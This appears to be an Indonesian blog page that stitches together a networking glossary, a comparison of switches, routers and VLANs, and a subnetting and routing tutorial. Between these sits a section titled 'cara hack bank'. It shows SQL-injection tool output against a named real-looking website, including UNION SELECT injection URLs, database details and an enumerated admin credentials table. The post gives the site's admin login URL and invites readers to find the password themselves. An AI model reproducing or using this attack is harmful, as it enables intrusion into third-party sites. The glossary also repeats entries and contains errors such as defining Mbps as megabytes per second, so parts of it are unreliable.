terhubung dalam sebuah network ke komputer lokal. Proses download merupakan kebalikan dari
upload

Downstream - Istilah yang merujuk kepada kecepatan aliran data dari komputer lain ke komputer
lokal melalui sebuah network. Istilah ini merupakan kebalikan dari upstream.

Email - Electronic Mail. Pesan, biasanya berupa teks, yang dikirimkan dari satu alamat ke
alamat lain di jaringan internet. Sebuah alamat email yang mewakili banyak alamat email
sekaligus disebut sebagai mailing list. Sebuah alamat email biasanya memiliki format
semacam username@host.domain, misalnya: myname@mydomain.com

Ethernet - Ethernet adalah protokol LAN yang dikembangkan oleh Xerox Corporation yang
bekerjasama dengan DEC dan Intel pada tahun 1976. Ethernet menggunakan topologi bus atau star
dan medukung transfer data sampai dengan 10 Mbps. Versi terbarunya, Gigabit Ethernet,
mendukung tranfer data sampai dengan 1 Gigabit per detik atau 1000 Mbps

Ethernet Crossover Cable – Jenis kabel ethernet khusus yang membolehkan dua koputer
berhubungan satu sama lain secara langsung melalui adapter jaringan Ethernetnya

Fast Ethernet - Fast Ethernet seperti Ethernet biasa, namun dengan kecepatan transfer data
yang lebih cepat, sampai dengan 100 mbps. Ethernet ini juga disebut 100BaseT.

Firewall - Kombinasi dari hardware maupun software yang memisahkan sebuah network menjadi
dua atau lebih bagian untuk alasan keamanan.

File server - Sebuh komputer pada suatu jaringan yang menyediakan lokasi senteral untkk
menyimpan file sehingga semua komputer lain pada jaringan bisa mengaksesnya

FTP - File Transfer Protocol. Protokol standar untuk kegiatan lalu-lintas file (upload maupun
download) antara dua komputer yang terhubung dengan jaringan internet. Sebagian sistem FTP
mensyaratkan untuk diakses hanya oleh mereka yang memiliki hak untuk itu dengan mengguinakan
login tertentu. Sebagian lagi dapat diakses oleh publik secara anonim. Situs FTP semacam ini
disebut Anonymous FTP

Gateway - Dalam pengertian teknis, istilah ini mengacu pada pengaturan hardware maupun
software yang menterjemahkan antara dua protokol yang berbeda. Pengertian yang lebih
umum untuk istilah ini adalah sebuah mekanisme yang menyediakan akses ke sebuah sistem
lain yang terhubung dalam sebuah network

GPRS - General Packet Radio Service. Salah satu standar komunikasi wireless (nirkabel).
Dibandingkan dengan protokol WAP, GPRS memiliki kelebihan dalam kecepatannya yang dapat
mencapai 115 kbps dan adanya dukungan aplikasi yang lebih luas, termasuk aplikasi grafis dan
multimedia

GPS - Global Positioning System adalah sistem navigasi menggunakan 24 satelit MEO (medium
earth orbit atau middle earth orbit) yang mengelilingi bumi dan penerima-penerima di bumi.

IMAP - Internet Message Access Protocol. Protokol yang didisain untuk mengakses e-mail.
protokol lainnya yang sering digunakan adalah POP

Internet - Sejumlah besar network yang membentuk jaringan inter-koneksi (Inter-connected
network) yang terhubung melalui protokol TCP/IP. Internet merupakan kelanjutan dari ARPANet
dan kemungkinan merupakan jaringan WAN yang terbesar yang ada saat ini

Intranet - Sebuah jaringan privat dengan sistem dan hirarki yang sama dengan internet namun tidak
terhubung dengan jaringan internet dan hanya digunakan secar internal.

IP Address - Alamat IP (Internet Protocol), yaitu sistem pengalamatan di network yang
direpresentasikan dengan sederetan angka berupa kombinasi 4 deret bilangan antara 0 s/d 255 yang
masing-masing dipisahkan oleh tanda titik (.), mulai dari 0.0.0.1 hingga 255.255.255.255.

IPX/SPX - Jenis protocol komunikasi yang dipakai oleh komputer-komputer untuk berkomunikasi
satu sama lain pada suatu jaringan. Kebanyakan jaringan lebih menyukai TCP/IP ketimbang
SPX/IPX, karena TCP/IP adalah protocol yang dipakai di Internet

ISDN - Integrated Services Digital Network. Pada dasarnya, ISDN merupakan merupakan jalan
untuk melayani transfer data dengan kecepatan lebih tinggi melalui saluran telepon reguler. ISDN
memungkinkan kecepatan transfer data hingga 128.000 bps (bit per detik). Tidak seperti DSL,
ISDN dapat dikoneksikan dengan lokasi lain seperti halnya saluran telepon, sepanjang lokasi
tersebut juga terhubung dengan jaringan ISDN

ISP - Internet Service Provider. Sebutan untuk penyedia layanan internet

LAN - local-area network. Komputer yang terhubung berada pada tempat yang berdekatan
secara gografis (misalkan satu gedung)

Leased Line - Saluran telepon atau kabel fiber optik yang disewa untuk penggunaan selama 24
jam sehari untuk menghubungkan satu lokasi ke lokasi lainnya. Internet berkecepatan tinggi
biasanya menggunakan saluran ini.

Mbps - megabyte per second. Ukuran bandwidth, atau aliran komunikasi, melalui suatu
jaringan atau media komunikasi lain

Network - adalah sekumpulan dua atau
lebih sistem komputer yang digandeng dan
membentuk sebuah jaringan. Internet sebenarnya adalah sebuah network dengan skala
yang sangat besar

Network bridge - Bagian dari device hardware atau software yang membuat koneksi di antara
jenis-jenis media jaringan yang berbeda. Windows XP menyediakan software network bridge yang
mudah di-setup


Mbps - megabyte per second. Ukuran bandwidth, atau aliran komunikasi, melalui suatu
jaringan atau media komunikasi lain


Network - adalah sekumpulan dua atau
lebih sistem komputer yang digandeng dan
membentuk sebuah jaringan. Internet sebenarnya adalah sebuah network dengan skala
yang sangat besar.

Network bridge - Bagian dari device hardware atau software yang membuat koneksi di antara
jenis-jenis media jaringan yang berbeda. Windows XP menyediakan software network bridge yang
mudah di-setup.


Node - Suatu komputer tunggal yang tersambung dalam sebuah network.

Packet Switching - Sebuah metode yang digunakan untuk memindahkan data dalam
jaringan internet. Dalam packet switching, seluruh paket data yang dikirim dari sebuah node
akan dipecah menjadi beberapa bagian. Setiap bagian memiliki keterangan mengenai asal
dan tujuan dari paket data tersebut

POP - Post Office Protocol. Protokol standar yang digunakan untuk mengambil atau membaca
email dari sebuah server. protokol POP yang terakhir dan paling populer digunakan adalah POP3.
protokol lain yang juga sering digunakan adalah IMAP. Adapun untuk mengirim email ke sebuah
server digunakan protokol SMTP

Port - Titik koneksi pada sebuah komputer yang datanya bisa diberikan dan diambil. Beberapa port
berbentuk fisik, misalnya port TCP/IP yang dipakai sebuah komputer untuk berkomunikasi dengan
komputer-komputer lain di Internet.

PPP - Point to Point Protocol. Sebuah protokol TCP/IP yang umum digunakan untuk
mengkoneksikan sebuah komputer ke internet melalui saluran telepon dan modem

Protokol - Protocol. Seperangkat aturan yang mengatur secara tepat format komunikasi antar
sistem. Sebagai contoh, protokol HTTP mengatur format komunikasi antara browser web dan
browser server. Protokol IMAP mengatur format komunikasi antara server email IMAP dengan
klien

PSTN - Public Switched Telephone Network. Sebutan untuk saluran telepon konvensional yang
menggunakan kabel.

Repeater - Suatu perangkat yang dipasang di titik-titik tertentu dalam jaringan untuk
memperbarui sinyal-sinyal yang di transmisikan agar mencapai kembali kekuatan dan
bentuknya yang semula, guna memperpanjang jarak yang dapat di tempuh. Ini di perlukan
karena sinyal-sinyal mengalami perlemahan dan perubahan bentuk selama transmisi

RJ-11 - Stopkontak modul standar yang dipakai untuk koneksi telepon. RJ-11 bisa mencapai enam
pin tetapi biasanya hanya memakai empat pin.

RJ-45 connector - Stopkontak modul standar yang dipakai untuk jaringan Ethernet. RJ-45
connector mempunyai delapan pin, yang kadang-kadang dinamakan position

Router - Sebuah komputer atau paket software yang dikhususkan untuk menangani koneksi antara
dua atau lebih network yang terhubung melalui packet switching. Router bekerja dengan melihat
alamat tujuan dan alamat asal dari paket data yang melewatinya dan memutuskan rute yang harus
digunakan oleh paket data tersebut untuk sampai ke tujuan.

Routing - Proses dari penentuan sebuah path yang di pakai untuk mengirim data ke tujuan tertentu.

SDSL - Symmetric Digital Subscriber Line. Salah satu tipe DSL yang memungkinkan
transfer data untuk upstream maupun downstream berjalan pada kecepatan yang sama.
SDSL umumnya berkerja pada kecepatan 384 kbps (kilobit per detik).


Server - Suatu unit yang berfungsi untuk menyimpan informasi dan untuk mengelola suatu jaringan
komputer.komputer server akan melayani seluruh client atau workstation yang terhubung ke
jaringannya.

SMTP - Simple Mail Transfer Protocol. Protokol standar yang digunakan untuk mengirimkan email
ke sebuah server di jaringan internet. Untuk keperluan pengambilan email, digunakan protokol POP.
SSH - Secure Shell. Protokol pengganti Telnet yang memungkinkan akses yang lebih secure ke
remote-host.

TCP/IP - Transmission Control Protocol/Internet Protocol. Satu set protokol standar yang
digunakan untuk menghubungkan jaringan komputer dan mengalamati lalu lintas dalam
jaringan. protokol ini mengatur format data yang diijinkan, penanganan kesalahan (error
handling), lalu lintas pesan, dan standar komunikasi lainnya. TCP/IP harus dapat bekerja diatas
segala jenis komputer, tanpa terpengaruh oleh perbedaan perangkat keras maupun sistem operasi
yang digunakan

Telnet - Perangkat lunak yang didesain untuk mengakses remote-host dengan terminal yang
berbasis teks, misalnya dengan emulasi VT100. Penggunaan Telnet sangat rawan dari segi sekuriti.
Saat ini penggunaan Telnet telah digantikan oleh protokol SSH dengan tingkat keamanan yang lebih
baik

Topologi - pengaturan keterhubungan antar sistem komputer. Terdapat bermacam-macam topologi
seperti bus, star, dan ring

Twisted Pair – Media yang digunakn pada topologi star. Media ini saat ini paling umum dipakai
karena topologi star paling banyak digunakan

UDP - User Datagram Protocol. Salah satu protokol untuk keperluan transfer data yang
merupakan bagian dari TCP/IP. UDP merujuk kepada paket data yang tidak menyediakan
keterangan mengenai alamat asalnya saat paket data tersebut diterima

VOIP - Voice over IP. VoIP adalah suatu mekanisme untuk melakukan pembicaraan telepon (voice)
dengan menumpangkan data dari pembicaraan melalui Internet atau Intranet (yang menggunakan
teknologi IP).

VPN - Virtual Private Network. Istilah ini merujuk pada sebuah network yang sebagian diantaranya
terhubung dengan jaringan internet, namun lalu lintas data yang melalui internet dari network ini
telah mengalami proses enkripsi (pengacakan). Hal ini membuat network ini secara virtual
"tertutup" (private).

VSAT - Very Small Aperture Terminal stasiun bumi yang digunakan pada satelit komunikasi sinyal
data, suara, dan video, kecuali pemancaran televisi. VSAT terdiri dari dua bagian: sebuah
transceiver yang diletakkan ditempat terbuka sehingga dapat secara langsung menerima sinyal dari UV
satelit dan sebuah piranti yang diletakkan dalam ruangan untuk menghubungkan transceiver dan
piranti komunikasi pengguna akhir(end user), seperti PC. VSAT dapat mengirimkan data sampai
dengan kecepatan 56 Kbps.

WAN - wide-area network. Komputer yang terhubung berada pada tempat yang berjauhan
dan dihubungkan dengan line telepon atau gelombang radio.

WAP - Wireless Application Protocol. Standar protokol untuk aplikasi wireless (seperti yang
digunakan pada ponsel). WAP bekerja dalam modus teks dengan kecepatan sekitar 9,6 kbps.
Belakangan juga dikembangkan protokol GPRS yang memiliki beberapa kelebihan dibandingkan
WAP.

Workstation – adalah komputer yang terhubung dengan sebuah Local Area Network (LAN)

X.25 - adalah International Telecommunication Union-Telecomunication Standardization
Sector(ITU-T),protocol standard untuk komunikasi WAN. Bagaimana cara mengkoneksi
antara perlengkapan pengguna dan perlengkapan jaringan. X.25 didesain untuk
mengoperasikan keefektivan tanpa memperhatikan tipe system koneksi ke jaringan. Ini khususnya
digunakan untuk mengoperasikan dalam Packet Switched Networks (PSNs), contohnya perusahaan
telepon

perbedaan cisco vlan sama router cisco

Perbandingan Switch LAN dengan Router

Perbedaan mendasar switch dan router adalah prinsip kerjanya yang berbeda dilihat dari referensi lapisan OSI. Perbedaan ini menghasilkan cara yang berbeda dalam mengatur lalu lintas jaringan.

*
Loops, penggunaan beberapa switch dalam satu jaringan memungkinkan terjadinya loop pada komunikasi antar host/workstation. Switch mempunyai teknologi algoritma Spanning Tree Protocol (STP) untuk mencegah loop data seperti ini. Jika dibandingkan dengan router, router menyediakan komunikasi yang bebas loop dengan jalur yang optimal.
*
Convergence, dalam switch yang transparan bisa terjadi jalur data secara switching lebih panjang jika dibandingkan dengan penggunaan router. Protokol routing seperti OSPF (Open Shortest Path First) menyediakan komunikasi routing data berdasarkan jalur data terdekat.
*
Broadcast, switch LAN tidak memfilter data broadcast dan multicast karena switch beroperasi pada lapisan 2 sedangkan broadcast/multicast adalah paket data di lapisan 3, broadcast yang berlebihan bisa menyebabkan kondisi yang disebut broadcast-storm. Pada router broadcast dan multicast tidak diforward dan bisa difilter.
*
Subnet, switch dan router mempunyai perbedaan mendasar dalam mengurangi broadcast domain, secara fisik kita bisa merancang segmentasi LAN, dalam teknologi routing perbedaan subnet tidak dibatasi secara fisik harus dalam switch yang sama.
*
Security, kombinasi switch dan router mampu meningkatkan keamanan secara protokol masing-masing. Switch bisa memfilter header paket data berdasarkan MAC address dan router selain memfilter di lapisan 3 network juga mampu memfilter berdasarkan MAC address.
*
Media-Dependence, dua faktor yang harus dipertimbangkan dalam perancangan jaringan heterogen (mixed-media), yang pertama adalah faktor Maximum Transfer Unit (MTU), tiap topologi mempunyai MTU yang berbeda. Yang kedua adalah proses translasi paket karena perbedaan media di atas. Switch secara transparan akan menerjemahkan paket yang berbeda supaya tetap saling berkomunikasi. Pada router terjadi secara independen karena router bekerja di lapisan network, bukan lapisan data-link.

Kelebihan Switch

*
Switch dan Switch VLAN sama-sama bekerja di lapisan kedua lapisan OSI. Implementasi teknologi pada lapisan ini memberikan tiga kelebihan utama:
*
Bandwidth, switch LAN memberikan bandwidth yang dedicated untuk setiap dan antar portnya. Jika masing-masing port tersambung ke switch lagi atau share-hub maka tiap segmen tersebut mendapat alokasi bandwidth yang sama (contohnya adalah gambar implementasi VLAN di atas). Teknik ini biasa disebut dengan segmentasi mikro (microsegmenting).
*
VLAN, switch VLAN mampu membagi grup port secara fisik menjadi beberapa segmen LAN secara logik, masing-masing broadcast domain yang terjadi tidak akan saling mengganggu antar VLAN. VLAN ini sering juga disebut sebagai switched domains atau autonomous switching domains. Komunikasi antar VLAN membutuhkan router (berfungsi sebagai gateway masing-masing VLAN).
*
Otomatisasi pengenalan dan penerjemahan paket, salah satu teknologi yang dikembangkan oleh Cisco adalah Automatic Paket Recognition and Translation (APaRT) yang berfungsi untuk menyediakan transparansi antara Ethernet dengan CDDI/FDDI.

Kelebihan Router

*
Broadcast/Multicast Control, router mampu mengendalikan broadcast dan multicast dengan tiga cara yaitu dengan meng-cache alamat host, meng-cache layanan network-advertise dan menyediakan protokol khusus seperti Internet Group Message Protocol (IGMP) yang biasa dipakai dalam jaringan Multicast Backbone.
*
Broadcast Segmentation, untuk mencegah broadcast router juga bertanggungjawab dengan cara yang berlainan tergantung protokol yang dipakai misalnya dalam TCP/IP menggunakan proxy ARP dan protokol Internet Control Message Protocol (ICMP).
*
Media Transition, dalam jaringan heterogen router mampu menerjemahkan paket ke dalam media yang berbeda, dalam kondisi ini paket data di-fragmentasi oleh router karena perbedaan MTU.

Kelebihan VLAN

Isu utama implementasi VLAN dibandingkan jaringan hub/flat adalah scalability terhadap topologi jaringan dan penyederhanaan manajemen. Kelebihan yang ditawarkan pada VLAN adalah:

*
Broadcast control, layaknya switch biasa membatasai broadcast domain VLAN mampu membatasi broadcast dari masing-masing grup-grup VLAN, antar VLAN tidak terjadi broadcast silang.
*
Security, meskipun secara fisik berada dalam switch yang sama VLAN membentengi sebuah grup dari VLAN lain atau dari akses luar jaringan, selain itu implementasi firewall di routernya bisa dipasang juga.
*
Performance, pengelompokkan secara grup logik ini memberikan jalur data yang dedicated untuk setiap grup, otomatis masing-masing grup mendapat kinerja jalur data yang maksimum.
*
Management, prinsip logik pada VLAN memberikan kemudahan secara manajemen, seorang user dari satu grup VLAN yang berpindah lokasi tidak perlu lagi mengganti koneksi/sambungan ke switch, administrator cukup mengubah anggota grup VLAN tersebut (port baru masuk grup VLAN dan port lama dikeluarkan dari grup VLAN).

Implementasi VLAN

Implementasi VLAN pada sebuah switch bisa dibedakan atas:

*
port, cara ini mengatur agar setiap port hanya mendukung satu VLAN, workstation dalam VLAN yang sama memperoleh sambungan switched dan komunikasi antar VLAN harus routedmelalui perangkat khusus router atau internal switch itu sendiri jika mendukung teknologi routing (perangkat ini sering disebut sebagai Switch Layer 3). Cara seperti ini sering disebut sebagai segment-based VLAN.
*
protokol, VLAN berdasarkan alamat network (OSI lapisan ketiga) memungkinkan topologi virtual untuk setiap protokol, dengan setiap protokol mempunyai rule, firewall dll. Routing antar VLAN akan terjadi secara otomatis tanpa tambahan perangkat router eksternal. Dengan kata lain VLAN ini membolehkan satu port menjadi beberapa VLAN. Cara seperti ini sering disebut sebagai virtual subnet VLAN.
*
user defined, cara ini bisa dianggap paling fleksibel, membolehkan switch membentuk VLAN atas dasar paket data, sebagai contoh VLAN disusun atas dasar MAC address.

cara hack bank

Code:
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17--
[+] Evasion Used: "+" "--"
[+] 21:25:25
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,
[+] Column Length is: 5
[+] Found null column at column #: 1
[+] SQLi URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,1,2,3,4--
[+] darkc0de URL: http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4
[-] Done!

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:26:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:27:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...

[+] Found a table called: admin

[+] Now searching for columns inside table "admin"
[!] Found a column called:username
[!] Found a column called:password
[!] Found a column called:id
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.k9bloodbank.com/newsdetail.php?id=17+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4--
[+] Evasion Used: "+" "--"
[+] 21:29:03
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: k9bloodbank_com
User: hmziller@localhost
Version: 4.0.27-log
[+] Dumping data from database "k9bloodbank_com" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] -=[CENCORED BY ME....!!!!!!]=-

[-] [21:29:15]
[-] Total URL Requests 3
[-] Done


loginnya di
Code:
http://www.k9bloodbank.com/admin



passnya ane sensor, klo mw, cari sendiri yah...,,

thx,,...

jaqk OUT....,,,,,

ip routing

Konsep IP address, network address, subnet mask, broadcast address merupakan dasar dari teknik routing di Internet. Untuk memahami ini semua kemampuan matematika khususnya matematika boolean, atau matematika binary akan sangat membantu memahami konsep routing Internet. Contoh pertanyaan yang sering dilontarkan,

• Mengapa kita memilih IP address 192.168.1.111?
• Mengapa subnet mask yang digunakan 255.255.255.0? mengapa bukan angka lain?
• Mengapa network address 167.205.10.0?
• Mengapa broadcast address-nya 202.159.32.15?
• Dll.

Bagaimana menentukan semua alamat-alamat tersebut? Hal tersebut yang akan dicoba dijelaskan secara sederhana dalam tulisan ini.

Kalkulator - Alat bantu yang dibutuhkan

Untuk memudahkan kehidupan anda, ada baiknya menggunakan fasilitas kalkulator yang ada di Windows. Di Windows 98 dapat di akses melalui Start  Programs  Accessories  Calculator.

Calculator yang standar memang sulit digunakan untuk membantu kalkulasi biner, oleh karena itu pilih View  Scientific untuk memperoleh tampilan kalkulator scientifik yang dapat digunakan untuk perhitungan biner.

Dengan cara memindah mode operasi ke bin, maka nilai yang ada akan berubah menjadi binary. Pada gambar contoh diperlihatkan nilai awal 15 desimal, di pindahkan menjadi 1111 binary.

Sedikit Aljabar Boolean

Aljabar boolean adalah teknik menghitung dalam bilangan binary 101010111 dsb. Proses konversi dari desimal ke binary sudah tidak perlu kita pikirkan lagi karena sudah dibantu menggunakan kalkulator yang ada di Windows 98.

Dari sekian banyak fungsi yang ada di aljabar boolean, seperti and, or, xor, not dll., untuk keperluan teknik routing di Internet, kita hanya memerlukan fungsi “dan” atau “and”. Contoh,

1 and 1 = 1
1 and 0 = 0
0 and 1 = 0
0 and 0 = 0

atau yang lebih kompleks

11001010.10011111.00010111.00101101
di AND dengan
11111111.11111111.11111111.00000000
menjadi
11001010.10011111.00010111.00000000

Tidak percaya? Coba saja masukan angka-angka di atas ke kalkulator Windows, anda akan memperoleh hasil persis seperti tertera di atas. Pusing? Mari kita konversikan bilangan binary di atas menjadi bilangan desimal supaya anda tidak terlalu pusing melihat angka 10101 dsb. Dalam notasi desimal, kalimat di atas menjadi,

202.159.23.45
di AND dengan
255.255.255.0
menjadi
202.159.23.0

Cukup familiar? Coba perhatikan nilai-nilai alamat IP yang biasa kita masukan di Start  Settings  Control Panel  Network  TCP/IP Properties.

Kalau kita perhatikan baik-baik maka panjang sebuah alamat IP adalah 32 bit, yang dibagi dalam empat (4) segmen yang di beri tanda titik “.” antar segmen-nya. Artinya setiap segmen terdapat delapan ( bit.

Alokasi jumlah alamat IP di Jaringan

Teknik subnet merupakan cara yang biasa digunakan untuk mengalokasikan sejumlah alamat IP di sebuah jaringan (LAN atau WAN). Teknik subnet menjadi penting bila kita mempunyai alokasi IP yang terbatas misalnya hanya ada 200 IP yang akan di distribusikan ke beberapa LAN.

Untuk memberikan gambaran, misalkan kita mempunyai alokasi alamat IP dari 192.168.1.0 s/d 192.168.1.255 untuk 254 host, maka parameter yang digunakan untuk alokasi adalah:
192.168.1.255 – broadcast address LAN
255.255.255.0 - subnet mask LAN
192.168.1.0 – netwok address LAN.
192.168.1.25 – contoh IP address salah workstation di LAN.

Perhatikan bahwa,

• Alamat IP yang pertama 192.168.1.0 tidak digunakan untuk workstation, tapi untuk menginformasikan bahwa LAN tersebut menggunakan alamat 192.168.1.0. Istilah keren-nya alamat IP 192.168.1.0 di sebut network address.

• Alamat IP yang terakhir 192.168.1.255 juga tidak digunakan untuk workstation, tapi digunakan untuk alamat broadcast. Alamat broadcast digunakan untuk memberikan informasi ke seluruh workstation yang berada di network 192.168.1.0 tersebut. Contoh informasi broadcast adalah informasi routing menggunakan Routing Information Protocol (RIP).

• Subnet mask LAN 255.255.255.0, dalam bahasa yang sederhana dapat di terjemahkan bahwa setiap bit “1” menunjukan posisi network address, sedang setiap bit “0” menunjukan posisi host address.

Konsep network address & host address menjadi penting sekali berkaitan erat dengan subnet mask. Perhatikan dari contoh di atas maka alamat yang digunakan adalah

192.168.1.0 network address
192.168.1.1 host ke 1
192.168.1.2 host ke 2
192.168.1.3 host ke 3
……
192.168.1.254 host ke 254
192.168.1.255 broacast address

Perhatikan bahwa angka 192.168.1 tidak pernah berubah sama sekali. Hal ini menyebabkan network address yang digunakan 192.168.1.0. Jika diperhatikan maka 192.168.1 terdiri dari 24 bit yang konstan tidak berubah, hanya delapan ( bit terakhir yang berubah memberikan identifikasi mesin yang mana. Tidak heran kalau netmask yang digunakan adalah

(binary) 11111111.11111111.11111111.00000000
(desimal) 255.255.255.0.

Walaupun alamat IP workstation tetap, tapi netmask yang digunakan di masing-masing router akan berubah-ubah tergantung posisi router dalam jaringan. Bingung? Mari kita lihat analogi di jaringan telepon yang biasa kita gunakan sehari-hari, misalnya kita mempunyai nomor telepon yang dapat di telepon dari luar negeri dengan nomor,

+62 21 420 1234

Lokasi nomor telepon tersebut di Jakarta, dengan sentral sekitar senen & cempaka putih. Kita perhatikan perilaku sentral telepon di tiga lokasi

1. Sentral di Amerika Serikat
2. Sentral di Indosat Jakarta
3. Sentral telepon di Telkom Jakarta Gatot Subroto
4. Sentral telepon di Senen, Cempaka Putih.

Pada saat kawan kita di amerika serikat akan menghubungi rekannya di Jakarta dengan nomor +62 21 420 1234.

Pada sentral di Amerika Serikat, hanya memperhatikan dua digit pertama (+62), setelah membaca angka +62 tanpa memperdulikan angka selanjutnya maka sentral di Amerika Serikat akan menghubungi gerbang SLI di Indosat Jakarta untuk memperoleh sambungan. Perhatikan di sini netmask di sentral amerika serikat untuk jaringan di Indonesia hanya cukup dua digit pertama, selebihnya di anggap host (handset) di jaringan telepon Indonesia yang tidak perlu di perdulikan oleh sentral di Amerika Serikat.

Pada sentral Indosat Jakarta, berbeda dengan sentral di Amerika Serikat, akan memperhatikan dua digit selanjutnya (jadi total +62 21). Dari informasi tersebut sentral indosat mengetahui bahwa trafik tersebut untuk Jakarta dan akan meneruskan trafik ke sentral Telkom di Jl. Gatot Subroto di Jakarta. Perhatikan sekarang netmask menjadi empat (4) digit.

Pada sentral Telkom di Gatot Subroto Jakarta akan melihat tiga (3) digit selanjutnya (+62 21 420). Dari informasi tersebut maka sentral Telkom Gatot Subroto akan meneruskan trafik ke sentral yang lebih rendah kemungkinan di Gambir atau sekitar Senen. Perhatikan sekarang netmask menjadi tujuh (7) digit.

Pada sentral terakhir di Gambir atau Senen, akan dilihat pelanggan mana yang di tuju yang terdapat dalam empat digit terakhir (1234). Maka sampailah trafik ke tujuan. Nomor pelanggan kira-kira ekuivalen dengan host address di jaringan Internet.

Mudah-mudahan menjadi lebih jelas fungsi netmask. Secara sederhana netmask digunakan untuk memisahkan antara network address & host address untuk memudahkan proses routing di jaringan Internet. Dengan adanya netmask kita tidak perlu memperhatikan seluruh alamat IP yang ada, tapi cukup memperhatikan segelintir network address saja.

Beberapa contoh network address di Internet di Indonesia, dapat dengan mudah mengidentifikasi ISP atau pemilik jaringan tersebut, misalnya,

202.134.0.0 telkom.net
202.154.0.0 rad.net.id
202.159.0.0 indo.net.id
202.158.0.0 cbn.net.id
167.205.0.0 itb.ac.id

terlihat jelas bahwa terdapat sebuah struktur penomoran, terlihat sekali bahwa IP address dengan awalan 202 umumnya ISP dari Indonesia yang di alokasikan oleh penguasa IP di Internet seperti www.icann.org. Dengan teknik ini sebetulnya dari Internet untuk mengarah ke Indonesia cukup melakukan masking dengan mask

255.0.0.0

karena delapan ( bit pertama yang perlu di mask. Biasanya pada router dapat juga di tulis dengan kalimat

202.159.0.0/8

ada slash /8 di belakang IP address menandakan bahwa cukup delapan ( bit pertama yang perlu diperhatikan.

Selanjutnya untuk mengarahkan paket data ke jaringan internal di IndoNet (indo.net.id), maka masking pada router di IndoNet atau berbagai ISP di Jakarta adalah

255.255.0.0

atau pada router tersebut dapat digunakan routing ke arah

202.159.0.0/16

perhatikan sekarang slash yang digunakan adalah slah 16 (/16), artinya cukup diperhatikan 16 bit saja dari total 32 bit IP address yang ada.

Selanjutnya mengarahkan paket ke PT. Antah Berantah yang memiliki sambungan leased line di IndoNet, pada router di IndoNet dapat digunakan masking yang tidak terlalu normal misalnya

255.255.255.240

atau dapat digunakan pengalamatan

202.159.12.0/24

artinya router harus memperhatikan 24 bit pertama dari IP address.

Sintaks Penambahan Route

Setelah kita mengetahui pola fikir routing pada Internet, maka langkah selanjutnya yang perlu kita tahu adalah cara menambahkan route pada tabel route di komputer. Hal ini tidak terlalu sukar, perintah yang dapat digunakan adalah

C:> route (di Windows)

# route (di Linux)

di Windows format penambahan route tersebut sangat sederhana yaitu

C:> route add 202.159.0.0 netmask 255.255.0.0 192.168.0.1 metric 3

Di Linux format-nya dapat menjadi

# route add –net 202.159.0.0/16 gw 192.168.0.1 metric 3

Dimana 202.159.0.0 adalah network address (dapat juga kalau dibutuhkan kita memberikan routing ke sebuah host); 255.255.0.0 atau /16 adalah netmask yang digunakan; 192.168.0.1 adalah gateway yang digunakan; metric 3 menandakan prioritas routing, yang dapat dikosongkan saja.

Untuk melihat tabel routing di komputer kita dapat dilakukan dengan perintah

C:> netstat –nr (di Windows)
C:> route print (di Windows)

# netstat –nr (di Linux)
# route (di Linux)

Tentunya akan pusing kepala jika kita beroperasi pada jaringan yang kompleks. Sebaiknya kita menggunakan teknik routing yang automatis. Hal ini dapat dilakukan dengan mudah di Linux dengan menjalankan software seperti

# routed
atau
# bria

software routing seperti ini mungkin ada di Windows NT atau Windows 2000, tapi tidak pada Windows 98.
 
Home | Gallery | Tutorials | Freebies | About Us | Contact Us

Copyright © 2009 Karya Anak bangsa |Designed by Templatemo |Converted to blogger by BloggerThemes.Net

Usage Rights

DesignBlog BloggerTheme comes under a Creative Commons License.This template is free of charge to create a personal blog.You can make changes to the templates to suit your needs.But You must keep the footer links Intact.